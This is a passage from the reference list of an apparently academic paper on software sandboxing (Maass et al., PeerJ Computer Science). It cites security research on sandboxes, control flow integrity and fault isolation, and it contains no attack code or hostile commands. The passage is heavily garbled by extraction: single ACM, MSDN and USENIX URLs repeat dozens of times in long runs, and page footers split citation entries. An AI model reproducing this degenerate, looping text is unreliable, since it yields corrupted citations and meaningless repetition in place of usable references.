Available at http://dl.acm.org/citation.cfm?id=2362793. 2362833. Graydon PJ, Knight JC, Strunk EA. 2007. Assurance based development of critical systems. In: Dependable systems and networks. Washington, D.C.: IEEE, 347–357. Hartley J. 2004. Current findings from research on structured abstracts. Journal of the Medical Library Association 92(3):368–371. Haynes RB, Mulrow CD, Huth EJ, Altman DG, Gardner MJ. 1990. More informative abstracts revisited. Annals of Internal Medicine 113(1):69–76 DOI 10.7326/0003-4819-113-1-69. Hiser J, Nguyen-Tuong A, Co M, Hall M, Davidson JW. 2012. ILR: where’d my gadgets go? In: IEEE symposium on security and privacy (SP ’12). Washington, D.C.: IEEE Computer Society, 571–585. Hogg J. 2015. Control flow guard. Available at http://blogs.msdn.com/b/vcblog/archive/2014/12/08/ visual-studio-2015-preview-work-in-progress-security-feature.aspx (accessed 30 April 2015). Homescu A, Brunthaler S, Larsen P, Franz M. 2013. Librando: transparent code randomization for just-in-time compilers. In: ACM conference on computer and communications security (CCS) (CCS ’13). New York: ACM, 993–1004. Jana S, Porter DE, Shmatikov V. 2011. TxBox: bbuilding secure, efficient sandboxes with system transactions. In: IEEE symposium on security and privacy. Washington, DC: IEEE, 329–344. Kagdi H, Collard ML, Maletic JI. 2007. A survey and taxonomy of approaches for mining software repositories in the context of software evolution. Journal of Software Maintenance and Evolution: Research and Practice 19(2):77–131 DOI 10.1002/smr.344. Kaufman L, Rousseeuw PJ. 2009. Finding groups in data: an introduction to cluster analysis. Vol. 344. New York: John Wiley & Sons. Kelly T. 1999. Arguing safety—a systematic approach to safety case management. PhD dissertation, Department of Computer Science, University of York. Kemerlis VP, Portokalidis G, Keromytis AD. 2012. kGuard: lightweight kernel protection against return-to-user attacks. In: USENIX security (Security’12). Berkeley: USENIX Association, 39–39. Available at http://dl.acm.org/citation.cfm?id=2362793.2362832. Kitchenham B, Brereton OP, Budgen D, Turner M, Bailey J, Linkman S. 2009. Systematic literature reviews in software engineering—a systematic literature review. Information and Software Technology 51(1):7–15 DOI 10.1016/j.infsof.2008.09.009. Knight J. 2015. The importance of security cases: proof is good, but not enough. IEEE Security Privacy Magazine 13(4):73–75 DOI 10.1109/MSP.2015.68. Krippendorff KH. 2013. Content analysis: an introduction to its methodology. Thousand Oaks: Sage. Krohn M, Yip A, Brodsky M, Cliffer N, Kaashoek MF, Kohler E, Morris R. 2007. Information flow control for standard OS abstractions. In: ACM symposium on operating systems principles (SOSP) (SOSP ’07). New York: ACM, 321–334. Lázár A, Ábel D, Vicsek T. 2009. Modularity measure of networks with overlapping communities. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 32/36 https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2387880.2387886 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dl.acm.org/citation.cfm?id=2362793.2362833 http://dx.doi.org/10.7326/0003-4819-113-1-69 http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/2014/12/08/visual-studio-2015-preview-work-in-progress-security-feature.aspx http://dx.doi.org/10.1002/smr.344 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dl.acm.org/citation.cfm?id=2362793.2362832 http://dx.doi.org/10.1016/j.infsof.2008.09.009 http://dx.doi.org/10.1109/MSP.2015.68 http://dx.doi.org/10.7717/peerj-cs.43 ArXiv preprint. arXiv:0910.5072. Li N, Mao Z, Chen H. 2007. Usable mandatory integrity protection for operating systems. In: IEEE symposium on security and privacy (SP ’07). Washington, DC: IEEE Computer Society, 164–178. Li Y, McCune J, Newsome J, Perrig A, Baker B, Drewry W. 2014. MiniBox: a two-way sandbox for x86 native code. In: 2014 USENIX annual technical conference (USENIX ATC 14). Philadelphia: USENIX Association, 409–420 Available at https://www.usenix.org/conference/ atc14/technical-sessions/presentation/li yanlin. Linn CM, Rajagopalan M, Baker S, Collberg C, Debray SK, Hartman JH. 2005. Protecting against unexpected system calls. In: USENIX security (SSYM’05). Berkeley: USENIX Association, 16–16. Available at http://dl.acm.org/citation.cfm?id=1251398.1251414. Louw MT, Ganesh KT, Venkatakrishnan VN. 2010. AdJail: practical enforcement of confidentiality and integrity policies on web advertisements. In: USENIX security (USENIX security’10). Berkeley: USENIX Association, 24–24. Available at http://dl.acm.org/citation.cfm? id=1929820.1929852. Louw MT, Venkatakrishnan VN. 2009. Blueprint: robust prevention of cross-site scripting attacks for existing browsers. In: IEEE symposium on security and privacy (SP ’09). Washington, D.C.: IEEE Computer Society, 331–346. Maass M, Scherlis WL, Aldrich J. 2014. In-nimbo sandboxing. In: Symposium and bootcamp on the science of security (HotSoS ’14). New York: ACM, 12 pages, Article 1. Maechler M, Rousseeuw P, Struyf A, Hubert M, Hornik K. 2014. Cluster: cluster analysis basics and extensions. R package version 1.15.2. Vienna: R Foundation for Statistical Computing. For new features, see the ‘Changelog’ file (in the package source). Mao Y, Chen H, Zhou D, Wang X, Zeldovich N, Kaashoek MF. 2011. Software fault isolation with API integrity and multi-principal modules. In: ACM symposium on operating systems principles (SOSP) (SOSP ’11). New York: ACM, 115–128. Mauczka A, Schanes C, Fankhauser F, Bernhart M, Grechenig T. 2010. Mining security changes in FreeBSD. In: Mining software repositories (MSR). Washington, DC: IEEE, 90–93. McCamant S, Morrisett G. 2006. Evaluating SFI for a CISC architecture. In: USENIX security (USENIX-SS’06). Berkeley: USENIX Association, 16 pages, Article 15. Available at http://dl.acm. org/citation.cfm?id=1267336.1267351. McCune JM, Li Y, Qu N, Zhou Z, Datta A, Gligor V, Perrig A. 2010. TrustVisor: efficient TCB reduction and attestation. In: IEEE symposium on security and privacy (SP ’10). Washington, D.C.: IEEE Computer Society, 143–158. McLean J. 1997. Is the trusted computing base concept fundamentally flawed? In: IEEE symposium on security and privacy (SP ’97). Washington, D.C.: IEEE Computer Society, 2 Available at http:/ /dl.acm.org/citation.cfm?id=882493.884390. Meyerovich LA, Livshits B. 2010. Conscript: specifying and enforcing fine-grained security policies for javascript in the browser. In: IEEE symposium on security and privacy (SP ’10). Washington, DC: IEEE Computer Society, 481–496. Mickens J. 2014. Pivot: fast, synchronous mashup isolation using generator chains. In: IEEE symposium on security and privacy (SP ’14). Washington, DC: IEEE Computer Society, 261–275. Moshchuk A, Wang HJ, Liu Y. 2013. Content-based isolation: rethinking isolation policy design on client systems. In: ACM conference on computer and communications security (CCS) (CCS ’13). New York: ACM, 1167–1180. Neumann PG. 1990. Inside risks: insecurity about security? Communications of the ACM 33:170–170 DOI 10.1145/79173.79113. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 33/36 https://peerj.com/computer-science/ http://arxiv.org/abs/0910.5072 https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin 